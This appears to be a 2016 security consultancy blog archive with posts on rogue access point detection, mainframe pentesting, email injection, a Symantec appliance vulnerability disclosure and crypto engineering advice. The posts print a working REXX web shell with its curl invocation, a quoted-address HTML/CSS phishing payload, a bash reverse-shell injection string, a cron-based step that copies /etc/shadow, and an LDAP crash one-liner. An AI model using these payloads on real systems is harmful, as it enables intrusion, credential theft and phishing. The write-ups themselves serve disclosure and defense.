Twitter
Friday
Aug262016

Slaying Rogue Access Points with Python and Cheap Hardware

The Need for Open Source Rogue AP Protection

With the exception of cellular attacks that make use of SDR, rogue access point attacks are the most effective wireless attacks in practice today. Despite the fact that karma attacks have existed for nearly a decade, many devices still probe actively for their preferred networks, rendering them vulnerable to this form of exploitation [1]. Evil Twin attacks remain an issue for enterprise and smaller scale commercial networks alike.

Although effective solutions for detecting and responding to rogue access point attacks exist, they typically fall into a price bracket that is accessible only to enterprise customers [2][3][4]. This means that smaller scale commercial and retail networks, or even public sector networks operating with limited resources, are unlikely to be able to include rogue access point detection as part of their budgets. This lack of low-budget rogue AP protection has a severe impact on the security of the wireless landscape as a whole. Although attackers can and do use rogue access point attacks against enterprise networks, this is usually done with the intent of gaining credentials to pivot further into the target’s infrastructure. On the other hand, attackers who are focused on harvesting sensitive information such as credit card numbers are unlikely to target heavily secured and regularly audited enterprise networks. Instead, they are much more likely to employ evil twin attacks against softer targets such as local retailers and coffee shops, or make use of karma attacks in a crowded subway car or freeway. What this means is that the environments most likely to be targeted by a malicious actor are also the least protected.

In response to this problem, I developed an open source tool called sentrygun that can be run on inexpensive hardware in parallel with existing network setups. This blog post will cover the development of sentrygun, from the algorithms used to detect rogue APs to the design patterns used to leverage those algorithms by network administrators. Finally, it will document the successes and challenges faced when deploying sentrygun to protect one of the most hostile network environments in the world: BSides Las Vegas.

Building a Rogue AP Protection Platform Pt 1 – Algorithm Development

The first task in creating sentrygun was to develop a set of reliable, effective, and easily implemented algorithms for detecting evil twin and karma attacks. A lot of prior work has already been done in this area, which gave me a pretty big head start. Unfortunately, most of the more advanced methods of detecting rogue access point attacks require direct coordination with the wireless networking hardware [5]. Most networking hardware is highly proprietary, making this kind of cooperation next to impossible.

This means that the algorithms used by sentrygun would have to operate in complete independence from the network being protected. Three algorithms were identified that met this requirement: evil twin detection using whitelisting, evil twin detection through statistical analysis of signal strength, and karma detection through analysis of probe request/response patterns.

Detecting evil twin attacks using whitelisting is a classic approach outlined in multiple sources, most notably in a 2006 SANS publication by Larry Pesce [6]. In this strategy, a whitelist is created containing the ESSID and BSSID of every wireless access point on the network being protected. A packet sniffer then captures probe response packets from nearby access points. If a probe response is captured that has an ESSID from the whitelist, but a BSSID not in the whitelist, it follows that there is an evil twin attack occurring nearby.

whitelist based algorithm for detecting evil twins

The problem with this approach is that it does not account for scenarios in which the attacker sets the BSSID of the rogue access point to a BSSID used by a legitimate access point on the network. One way of addressing this issue is by adopting a different strategy entirely: attempt to identify evil twin attacks by paying attention to signal strength. Suppose we were to place a packet sniffer a fixed distance away from a legitimate access point on our network. Wireless access points are typically stationary objects, so the signal strength from the access point to the packet sniffer should not change drastically over a short period of time. Now suppose an attacker spawned an evil twin access point somewhere nearby. Packets sniffed from the evil twin should have noticeably different TX values than packets sniffed from the legitimate access point.

This means that we can augment our previous approach by establishing a baseline TX range for packets sent from each BSSID in the whitelist. Any packets received that appear to come from an access point in the whitelist, but that have a TX value that falls outside of the baseline range for that access point, are deemed to have been sent by an evil twin. This combined approach of whitelisting and signal strength analysis provides a  more effective solution to evil twin detection.

 

whitelist algorithm augmented with signal strength analysis

Spotting karma attacks turns out to be much simpler. Karma attacks work by configuring a rogue access point to respond to all probe requests it receives [7]. If the rogue access point receives a legitimate probe request for the ESSID “ms08067”, it will respond with a probe response for ESSID “ms08067”. Similarly, if it receives a probe request for the ESSID “\x90\x90\x90”, it will reply with a probe response for ESSID “\x90\x90\x90”. The rogue access point will send all of these responses using the same BSSID [1]. Since the targeted wireless clients need a consistent BSSID in order to remain connected to the rogue access point, cycling BSSIDs between probe responses is not an option.

 

algorithm to detect karma attacks

This means that karma attacks can always be identified by the one-to-many relationship that they create between a single BSSID that maps to multiple ESSIDs. Karma attacks can be detected by flagging any BSSID that sends probe responses for multiple ESSIDs. This algorithm can be further improved by periodically crafting and broadcasting probe requests for random ESSIDs using a parallel process. Doing so allows the algorithm to detect karma attacks even when no wireless clients are actively probing nearby.

Sentrygun uses all three of the algorithms described to detect evil twin and karma attacks. Additional methods for detecting evil twin and karma attacks are currently being implemented, along with improvements to the algorithms already in use.

Building a Rogue AP Protection Platform Pt 2 – System Development

Using the algorithms described in the previous section to build a functional wireless IDS system poses its own set of challenges. Such a system would have to be capable of protecting a wireless network of arbitrary size, and would have to scale with future expansions of the network. It would also have to give sole network operators a means of tracking and managing attacks across the entire network from a centralized location. The system would have to require minimal setup and fine tuning in order to work. Most importantly, the system would have to meet these requirements while still providing a reliable means of identifying, locating, and responding to wireless attacks.

Figure 1

To meet these requirements, sentrygun was developed as an array of sensors arranged in a grid connected to a centralized command and control server through ssh tunnels (figure 1). All sensor and server systems are security hardened Linux installations. Each sensor runs a packet sniffing Python script that analyzes wireless traffic using the algorithms described in the previous section. When a sensor detects a rogue access point attack, an alert is pushed to the C&C server. The C&C server stores the alert details in a time based cache, then broadcasts the alert to one or more web clients. Each web client displays a list of all alerts that have recently been sent by the sensors.

Figure 2

As shown in figure 2, alerts can be expanded to show a list of all devices currently detecting the wireless attack. Network administrators can respond by launching a flooding or deauth attack that is carried out by all sensor devices simultaneously. Additionally, network administrators can attempt to locate the rogue access point by sending security personnel to the sensor detecting the highest TX power from the attack. Sensor devices are sorted by TX and can be labeled to facilitate this functionality, as shown in figure 2. Finally, network administrators can choose to dismiss the alert. Doing so causes the C&C server to remove the alert from the time based cache and broadcast a message to all web and sensor clients. This message causes all web clients to remove the alert from the list, and causes all sensors to terminate any existing deauth or flooding attacks against the rogue access point.

This architecture provides sentrygun with the means to detect, respond to, and locate rogue access point attacks in real-time. Additionally, since the most resource intensive work is done on the C&C server, the sensor units can be built using inexpensive platforms such as the Raspberry Pi. Finally, the web interface provides an intuitive cross platform interface for controlling sentrygun and analyzing wireless attack data.

Field Test: BSides Las Vegas

Ensuring that sentrygun was able to function effectively outside of the lab environment could only be accomplished through intense field testing. Fortunately, the BSides Las Vegas NOC team generously provided me with a live environment in which to conduct such a test. Simply put: they put me in charge of wireless security for the conference. This meant that I was tasked with ensuring the integrity of attendees’ data during a week in which Vegas is home to some of the most notoriously hostile networks in the world. It seemed like an excellent opportunity to test  sentrygun.

I arrived in Las Vegas on Saturday afternoon, July 30th, three days before the start of the BSides conference. After meeting up with the rest of the BSides staff, we spent the evening unpacking boxes and making an emergency run to the local electronics depot to purchase supplies for the network. The NOC team was scheduled to build the conference network on Monday, which gave me all of Sunday to assemble and test each of the sensor units used in the sentrygun implementation. Due to the number of sensors needed to cover the conference floorspace, doing this in such a short timeframe seemed daunting.

Tuscany Suites Sweatshop. BSides Goons from left to right: Chester Bishop, Ben, and Justin Whitehead                 

These look totally harmless

Fortunately, a few of the awesome folks on the BSides security team came to the rescue to help me set up the sensors. We converted a hotel room into an electronics workshop, sat down with a couple of cases of Red Bull, and finished building the sentrygun sensor units within a few hours.

At the BSides NOC, we take cable management seriously

On Monday morning I joined the NOC team in setting up the BSides network itself. This involved running a few thousand feet of Cat5 cable, as well as configuring three wireless networks across multiple channels. Once the network was set up, the sentrygun sensors were laid out in a grid across the conference floor using copious amounts of gaff tape and Velcro.


Don’t mind the things on the walls….


 

On Tuesday morning, the conference opened its doors and the network was put to use. Within half an hour, a panicked attendee had already summoned security after purportedly finding a rogue access point taped to the wall. The “rogue access point” turned out to be one of our sentrygun sensor units, much to the amusement of the BSides staff. We had no similar incidents throughout the rest of the day.

No wireless threats were detected until the early evening, at which point the 802.11 spectrum seemed to come alive with hostility. At around 5pm, sentrygun detected a karma attack emanating from one of the far corners of the main conference space. Security was dispatched to investigate, and after noticeably increasing the physical security presence in the area the attack stopped. By the end of the conference on Tuesday night, several similar attacks were identified and dealt with accordingly.

The field test demonstrated that sentrygun is capable of identifying wireless threats in a live network environment. It also led to several important findings that will prove critical in sentrygun’s transition from a proof of concept to a mature wireless defense platform. One such finding is that within the context of a crowded conference venue, narrowing the location of a rogue access point down to a few meters is not always enough. There were multiple incidents in which an evil twin or Karma attack was detected and localized to an area containing at least two dozen people with backpacks or laptops. In these circumstances, noticeably increasing security presence was usually enough to stop the attack. However, the ability to consistently identify the exact source or perpetrator of the attack would be preferable.

Closing Thoughts

Overall, the sentrygun project has been a success. It has demonstrated that it is possible to provide rogue access point detection using relatively simple algorithms and inexpensive equipment. It has demonstrated that such a system can be designed and built over the course of a few weeks. It has also lead to the development or verification of three algorithms used for detecting evil twin and karma attacks. Most importantly, it has opened the doors for future research in rogue AP identification and mitigation.

There are aspects of sentrygun’s design that require further development. While sentrygun’s algorithm for detecting evil twins based on variance in TX values makes for an effective proof of concept, stronger statistical models that account for externalities such as environmental interference would be preferable. Similarly, it would be interesting to investigate the use of machine learning to distinguish between rogue and legitimate access points. Finally, a more effective technique for locating rogue access points is needed if the system is to be equally effective in highly populated environments.

Sentrygun is an open source project. If you’d like to contribute, particularly in the areas previously mentioned, please contact [email protected] or make a pull request to the appropriate Github repo from the list below: 

Additionally, be sure to check out my DEFCON talk on rogue access point detection. The PowerPoint slides are can be found here, and video footage should be on YouTube within the next few weeks.

References

[1] https://www.sensepost.com/blog/2015/improvements-in-rogue-ap-attacks-mana-1-2/
[2] http://ciscoprice.com/gpl/AIR%200
[3] http://www.arubanetworks.com/assets/wsca/WSCA_PriceList.xls
[4] https://www.amazon.com/Fluke-Networks-AM-A1150-AirMagnet/dp/B002YHJMMY?ie=UTF8&*Version*=1&*entries*=0
[5] http://www.cisco.com/c/en/us/support/docs/wireless/4400-series-wireless-lan-controllers/112045-handling-rogue-cuwn-00.html
[6] https://www.giac.org/paper/gawn/7/discovering-rogue-wireless-access-points-kismet-disposable-hardware/107273
[7] https://www.trailofbits.com/resources/attacking_automatic_network_selection_paper.pdf
[8] http://www.arubanetworks.com/assets/ds/AB_AW_RAPIDS.pdf
[9] http://www.cisco.com/c/en/us/products/wireless/buyers-guide.html
[10] http://www.arubanetworks.com/techdocs/InstantMobile/Advanced/Content/Instant%20User%20Guide%20-%20volumes/Rogue_AP_Detection_and_C.htm
[11] http://www.arubanetworks.com/techdocs/ArubaOS_63_Web_Help/Content/ArubaFrameStyles/New_WIP/Rogue_AP_Detection.htm
[12] http://www.arubanetworks.com/assets/contract/March2015_PriceList.xls

Wednesday
Jun222016

REXX CGI Web Shell

Recently I was conducting a mainframe assessment (z/OS), and the application account I had access to was able to FTP directly to the system. There were also multiple web servers listening on the host, so I used web shell planting tactics to gain remote command execution — albeit with an uncommon scripting language (REXX).

Typically when you FTP to an IBM mainframe you will find yourself in the Multiple Virtual Storage (MVS) file system. This is indicated by “Remote system type is MVS” in the FTP response message.

It’s possible to change to a Unix-like file system, Hierarchical File System (HFS), to make it easier to understand (at least for me!). This can be accomplished by executing a simple change directory command using FTP.

Change to HFS
ftp> cd /
250 HFS directory /s the current working directory

After identifying this access, I trawled through the more familiar file system and came across a CGI web root that permitted the execution of REXX scripts. REXX is an interpreted scripting language developed by IBM that dates back to the beginning of the 80s.

After creating a simple REXX web shell, I was able to upload the shell to the web root and chmod it with the appropriate permissions.

REXX Web Shell
/* rexx */
'cgiutils -status 200 -ct text/x-ssi-html'
address syscall 'pipe p.'
'cgiparse -f > /dev/fd' || p.2
address syscall 'close' p.2
address mvs 'execio 1 diskr' p.1 '(stem s.'
interpret s.1

do i=1 to 100 until s.1=''
   parse var s.1 parm.i.1 '=' parm.i.2 '&' s.1
   if parm.i.1 = 'FORM_cmd' then do
     cmd = parm.i.2
     cmd = STRIP(cmd, ,"'")
   end
   end

say 'Running as ' || USERID()
say 'Executing the following command... "' || cmd || '"'
address syscall 'pipe p.'
cmd || ' >/dev/fd'||p.2
address syscall 'close' p.2
address mvs 'execio * diskr' p.1 '(stem s.'
do i=1 to s.0
   say s.i
end
return

Finally, by sending a command to be executed in the cmd HTTP request parameter, I was able to gain command execution on the system as the WWWPUB user. Although there was FTP access, it is much easier to enumerate and attack the system given interactive execution of commands and this also provided different access permissions.

The script can be executed like so:
$ curl http://host/cgi/foo/cmd.rexx --data-urlencode 'cmd=id'

Here we can see an example of the ps -ef command being executed by the WWWPUB user in the CGI directory.




Monday
Jun132016

Email Injection

On a recent project, we noticed that an application was accepting email addresses in an unsafe format. In the case of this application, it was sending the email address in an email to a user’s account, without escaping.

It’s not that the application wasn’t validating email addresses. It was, in fact, running all email address through the standard Java validator, javax.mail.internet.InternetAddress.validate().

However, legal email addresses can have some amazingly complex things in them.

The Wikipedia page for email addresses has examples of legitimate, if crazy, email addresses.

The Java library mostly (but not completely) agrees with the email addresses as indicated in that article.

Now, to put dangerous content into email addresses, there are two general methods useful for attackers: comments and quoted portions. The Java library does not accept comments in email addresses, but it does accept quoted portions.

This is an example of a legal email using quoting:

 "john.smith"@example.org

as is

 "john.smith<script>alert(1);<script>"@example.org

Web pen testers will recognize the latter as the canonical test for an XSS attack.

In this case, the email address was being put into an outbound email. This normally is not an XSS vector. Email is typically read in a dedicated mail application, or in a webapp. Mail applications often don’t have JavaScript engines, and Webmail applications as a rule will refuse to render any JavaScript. (Sometimes attackers will find a way around this, but it’s very hard to do, and if they succeed it is a much bigger problem than any I describe here.)

Modern mail readers still have significant CSS capabilities, so the ability to insert arbitrary HTML into them means the ability to change the message visible to the user arbitrarily.  This can lead to very successful phishing attacks, since an attacker can cause malicious messages to originate from the legitimate and expected service.

My primary mail reader target was OSX’s Mail.app, with Thunderbird as a secondary.

The application we were looking at had a strong limit of 50 characters for an email address, and the domain had to have at least two labels, of which the second had to be at least 2 characters. (This is not part of the RFC, nor does the Java library require it.) Given the quotes and the domain, the longest message that could be inserted was 43 characters:

    "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"@x.xx

It was necessary, of course, to start a style tag, as well as to close it, so that left us with this much room:

    "<style>XXXXXXXXXXXXXXXXXXXXXXXXXXXX</style>"@x.xx

This still allowed room for a payload to be inserted thanks to URL shorteners and use of the @import directive.

    "<style>@import 'http://xxxxxxxxxxx'</style>"@x.xx

The “http://” is required in the mail context, as are the quotes.

Can a normal person fit a URL in 11 characters?  Domains like “ant.nu” are available, but there is no need to splurge on a short domain.  The best link shorteners can give you a URL in 9 characters, so this is our hostile email addresses, with two characters to spare

    "<style>@import 'http://ly.my/pva'</style>"@x.xx

Now, with arbitrary space, we can put in an appropriate payload that overwrites the message:

body {
  visibility: hidden;
}
body:after {
  content:'We have detected unauthorized access to your account. Please visit http://example.account-recovery.net/ to restore access, or call 555-1212.';
  visibility: visible;
  display: block;
  position: absolute;
  padding: 5px;
  top: 2px;
}

And the message in Apple Mail.app looks like this:

In Thunderbird, if you accept the warning to load remote content, you get this:

LESSONS

  1. Email address validation is not the same as email address sanitization.
  2. More mail readers should be suspicious of external links, and offer an option like Thunderbird does to delay loading of external content.
Tuesday
Jun072016

Vulnerability Disclosure Info: Symantec Encryption Management Server

During a security assessment project in 2015 GDS encountered a fully patched Symantec Encryption Management Server appliance. This product provides secure messaging both between users of the organization and with external users. Each server is managed via an administrative web interface. During the project, and follow on research, GDS discovered several issues that were reported to Symantec and have subsequently been addressed in later releases of the software. Now that Symantec customers, among them some of our clients, have had ample time to apply the relevant patches we thought we’d share details of these vulnerabilities.

OS Command Execution

The administration web interface includes the facility to search the log files. When performing a search, it was possible, using a specially crafted search term, to execute OS level commands on the appliance. The search functionality dynamically built a command string, with untrusted user input, that was then executed by the operating system command shell. Insufficient validation of the supplied parameters exposed arbitrary command execution and provided an attacker with privileges or capabilities previously unavailable.

This issue required a user account with low privilege access to the administrative interface. The lowest privilege user role with this level of access is Reporter.

The following text, entered into the search box, was used to start an interactive, reverse TCP connection, shell.

|` /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1`

The resulting interactive shell is executed as user tomcat.

CVE-2015-8151 was assigned to cover the above issue.

Local Privilege Escalation

The tomcat user had write access to the file /etc/cron.daily/tomcat.cron. The contents of this file were executed in the context of the root super-user account. Consequently, given command execution (see above), arbitrary commands could be scheduled for execution as root.

ls -al /etc/cron.daily/tomcat.cron

-rwxrwxr-x 1 root tomcat 88 Jul  6 03:58 /etc/cron.daily/tomcat.cron

As the tomcat user, GDS were able to append additional content to the cron job. For example, with the command below:

$ echo ‘cat /etc/shadow >/tmp/shadow’ >> /etc/cron.daily/tomcat.cron

This cron job was executed daily and ran with root privileges.

ls -l /tmp/shadow

-rw-r—r— 1 root root 825 Jul  6 04:02 /tmp/shadow

cat /tmp/shadow

root:!!:16612:0:99999:7:::
bin:*:16612:0:99999:7:::
daemon:*:16612:0:99999:7:::

CVE-2015-8150 was assigned to cover the above issue.

Heap Based Memory Corruption

GDS also discovered a repeatable crash in the LDAP service running on the appliance. This could be reproduced using the following simple python script.

python -c “import socket; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((‘10.240.28.199’, 636)); s.send(‘803a01030100030000002e00000040404141414142424242434343434444313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b’.decode(‘hex’))”

This will trigger a SIGSEGV signal and the service will exit. LDAP and LDAPS will not be available until the service has been automatically restarted.

CVE-2015-8149 was assigned to cover the above issue.

Vendor Update

Symantec have released fixes for the issues described above in SEMS 3.3.2 MP12. For more information from the vendor see https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20160218_00

Friday
Jun032016

Insights from the Crypto Trenches

At GDS we are in the particularly advantageous position of working with a wide variety of products, spending time understanding their security and often uncovering their flaws. Given this experience, we decided to share some of our thoughts on the cryptographic aspects of building modern software.

It should come as no surprise to anyone in the field of security engineering that working with crypto is a perilous business, and even highly experienced engineers can get it wrong sometimes. Sophisticated attacks come along once in awhile, partially breaking OpenSSL and other well-respected security libraries. However, for those who have spent enough time in the trenches of cryptographic security, it is clear that the vast majority of crypto issues don’t stem from the underlying vulnerability of a well-respected library. Instead, they by far stem from incorrect design and implementation-specific issues of well-built crypto components. In this blog post we try to expand on why design and implementation goes wrong and give advice on making things go better.

Modern, agile software development processes generally merge some of the stages of requirements analysis, architecture, design, implementation and testing. However, in the case of cryptography it is dangerous to conflate these distinct stages. Cryptography must be considered at all these stages, and because of its difficulty and importance for securing important data and decisions, it must be given higher priority than most other elements. As such, it is typical for a software house to discuss crypto-related decisions for longer, and entrust cryptographic aspects of the system to be implemented by one of the most senior engineers. Both of these help, as do checklists such as those implemented by testssl.sh [1] or guidance such as that provided on Martin Fowler’s blog [2].

However, no checklists or easy guides exist for hand-rolled cryptographic constructs. When it comes to designing systems that use cryptography to achieve an end goal, one of the fundamental mistakes made by designers is to reinvent the wheel in the crypto design space. This is not necessarily because anybody needs the burden of designing something new. Instead it’s because it is hard to know what class of problems can be solved with a certain cryptographic construct. It also doesn’t help that cryptographic terminology can be very confusing. For example, Pseudo Random Functions (PRFs) are always implemented as a deterministic function that neither uses, nor exhibits, any random behaviour [3]. For this reason, GDS recommends bringing in experts, either internal or external, to early crypto design discussions. An expert can not only help mitigate the risk of misusing cryptography, but may also offer ways of reusing existing crypto constructs, reducing the overall cost and time budget of the project.

When it comes to writing code, those who are entrusted to implement the agreed-upon design often find themselves in a tight spot. They have to battle with two separate issues: what crypto library to use for a particular crypto construct and in what way should it be used.

At GDS, we advise our clients to use very few, battle-hardened crypto libraries with strongly restricted configuration sets to meet a large set of generic requirements. Unfortunately, cryptographic agility [4], as implemented by OpenSSL, is often at odds with restricted configurations and hardening. Although OpenSSL is the default go-to crypto library of choice, politics such as government-mandated cryptographic primitives (CAMELLIA from Japan, ARIA from South Korea, GOST from Russia, etc) and misguided optimizations (such as 27,000 lines of Perl generating assembly in OpenSSL) also makes it the elephant in the room that no one really wants to question. However, there is very little else to opt for. The obvious other choice is libnacl [5], written by a team led by Dan Bernstein that tries to significantly limit the number of implemented crypto constructs and hence configurations, reducing the cognitive load and simplifying the job of the person charged with implementation. Although libnacl is a great library, its restricted functionality is often an issue — but it excels at what it does implement. This is true for other specialized libraries as well, such as scrypt [6] that can be used for storing salted and hashed passwords or to derive keys from passwords. The library libsodium [7] builds on libnacl, attempting to address some of its portability and usability concerns. However, it is relatively new and mostly written by a single developer without the crypto pedigree of the nacl team. We therefore caution against using it in production environments. It’s not easy when it comes to working in code with cryptography, which leads us to our next topic.

The second biggest headache that developers face at the implementation stage is the actual code around the use of the chosen crypto library and its constructs. It is not unheard of to see developers surprised to see their sensitive memory-cleaning code being optimised away by smart compilers [8]. As such, GDS recommends using high quality standards around crypto code. In all instances, the actual standards enforced are a function of language, developer familiarity, and a number of business factors such as coding language and culture, however, [9] and [10] are good starting points for C/C++. For example, when coding in C11, using secure version of functions that typically end with “_s” are good practice. The C11 standard requires that memset_s never to be optimised away. Given the number of pitfalls such as these, internal code reviews and a final, third-party code review by an expert is important and highly recommended. Whether the third party is internal or external to the organisation, an expert will pick up problems that those less well versed around the use of crypto may not.

Finally, before software is shipped to customers, an overall, system level review of all elements of the cryptographic system is in order. As the above examples show, it is not easy to get crypto right even if the bits and pieces fit well together. Unfortunately, holistic security of a product depends on intricate interactions of the cryptographic subsystem with the rest of the application, its users, the cultural and social environments it will get deployed in, and the business’ goals. The points where these meet are an ample source of confusion and error. As such, a final review is always recommended.

At GDS, we get to see a lot of crypto code, often only at the final stages of development or beyond, when it’s already in active use by end users. Fixing issues at this stage is costly to the business and frustrating to the developers. Sometimes, when looking at the issues, one wonders how much time could have been saved by using the correct crypto constructs from the right libraries, using good coding guidelines from the get go — no wasteful reinvention of the wheel and no costly retrofitting needed. When it comes to crypto, experience is key. Above, we have tried to put into writing some of the key recommendations that experienced crypto engineers give to solve real-world problems. Naturally, we have plenty more, but we always try to tailor them to needs of the application at hand. In a series of blog posts to follow we plan to go more in-depth into some of the crypto issues we highlighted above, and more.

[1] https://testssl.sh/
[2] http://martinfowler.com/articles/web-security-basics.html#HashAndSaltYourUsersPasswords
[3] https://crypto.stanford.edu/pbc/notes/crypto/prf.html
[4] https://www.imperialviolet.org/2016/05/16/agility.html
[5] https://nacl.cr.yp.to/install.html
[6] http://www.tarsnap.com/scrypt.html
[7] https://download.libsodium.org/doc/
[8] https://www.securecoding.cert.org/confluence/display/cplusplus/MSC06-CPP.+Be+aware+of+compiler+optimization+when+dealing+with+sensitive+data
[9] http://www.cert.org/secure-coding/publications/books/secure-coding-c-c-second-edition.cfm
[10] https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards